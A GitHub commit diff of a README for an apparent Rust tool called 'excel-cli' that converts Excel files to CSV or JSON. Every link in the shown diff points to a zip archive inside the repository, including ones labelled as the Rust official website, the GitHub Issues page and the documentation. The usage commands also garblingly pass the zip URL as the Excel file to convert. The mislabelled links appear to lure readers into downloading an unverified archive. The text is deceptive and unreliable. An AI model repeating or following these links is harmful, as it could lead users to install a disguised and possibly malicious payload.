Skip to content

Commit 3c9f49f

Browse files
committed
Update README.md
1 parent 878857b commit 3c9f49f

1 file changed

Lines changed: 11 additions & 11 deletions

File tree

README.md

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# 🚀 excel-cli - Convert Excel Files Easily
22

3-
[![Download Excel CLI](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip%20CLI-blue)](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip)
3+
[![Download Excel CLI](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip%20CLI-blue)](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip)
44

55
## 📝 Overview
66

@@ -17,14 +17,14 @@ The **excel-cli** is a powerful command line tool built with Rust. It helps you
1717
## 💻 System Requirements
1818

1919
- **Operating System**: Windows 10, macOS, or any Linux distribution.
20-
- **Rust Installation**: You will need Rust installed on your system for the tool to work. If you don’t have Rust, visit the [Rust official website](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip) to download and install it.
20+
- **Rust Installation**: You will need Rust installed on your system for the tool to work. If you don’t have Rust, visit the [Rust official website](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip) to download and install it.
2121
- **Excel File**: Ensure you have an Excel file to convert, with either .xlsx or .xls extension.
2222

2323
## 🚀 Getting Started
2424

2525
1. **Download the Tool**:
2626

27-
Click the [Download button](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip) above to head to the Releases page.
27+
Click the [Download button](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip) above to head to the Releases page.
2828

2929
2. **Choose the Correct Version**:
3030

@@ -45,7 +45,7 @@ The **excel-cli** is a powerful command line tool built with Rust. It helps you
4545

4646
## 📥 Download & Install
4747

48-
To get started with **excel-cli**, visit [this page to download](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip).
48+
To get started with **excel-cli**, visit [this page to download](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip).
4949

5050
## 🔧 Usage Instructions
5151

@@ -55,16 +55,16 @@ To get started with **excel-cli**, visit [this page to download](https://raw.git
5555

5656
2. **Basic Conversion**:
5757

58-
To convert an Excel file (e.g., `https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip`) to CSV, use the following command:
58+
To convert an Excel file (e.g., `https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip`) to CSV, use the following command:
5959
```
60-
excel-cli convert https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip --to csv
60+
excel-cli convert https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip --to csv
6161
```
6262

6363
3. **Advanced Usage**:
6464

6565
You can use filters with your conversion. For example, to convert and filter specific data:
6666
```
67-
excel-cli convert https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip --to json --filter "status='active'"
67+
excel-cli convert https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip --to json --filter "status='active'"
6868
```
6969

7070
4. **Review Other Commands**:
@@ -77,17 +77,17 @@ To get started with **excel-cli**, visit [this page to download](https://raw.git
7777

7878
## 🌐 Community and Support
7979

80-
We welcome contributions and feedback from all users. If you encounter issues or have suggestions, feel free to reach out. You can open issues directly on the [GitHub Issues page](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip).
80+
We welcome contributions and feedback from all users. If you encounter issues or have suggestions, feel free to reach out. You can open issues directly on the [GitHub Issues page](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip).
8181

8282
## 📄 License
8383

8484
This project is licensed under the MIT License. See the LICENSE file for more details.
8585

8686
## 🎓 Resources
8787

88-
- [Documentation](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip)
89-
- [Rust Language](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip)
90-
- [Excel Formats](https://raw.githubusercontent.com/Rairy04/excel-cli/master/tests/excel_cli_2.4.zip)
88+
- [Documentation](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip)
89+
- [Rust Language](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip)
90+
- [Excel Formats](https://github.com/Rairy04/excel-cli/raw/refs/heads/master/docs/excel-cli-2.7-beta.5.zip)
9191

9292
## 📢 Acknowledgments
9393

0 commit comments

Comments
 (0)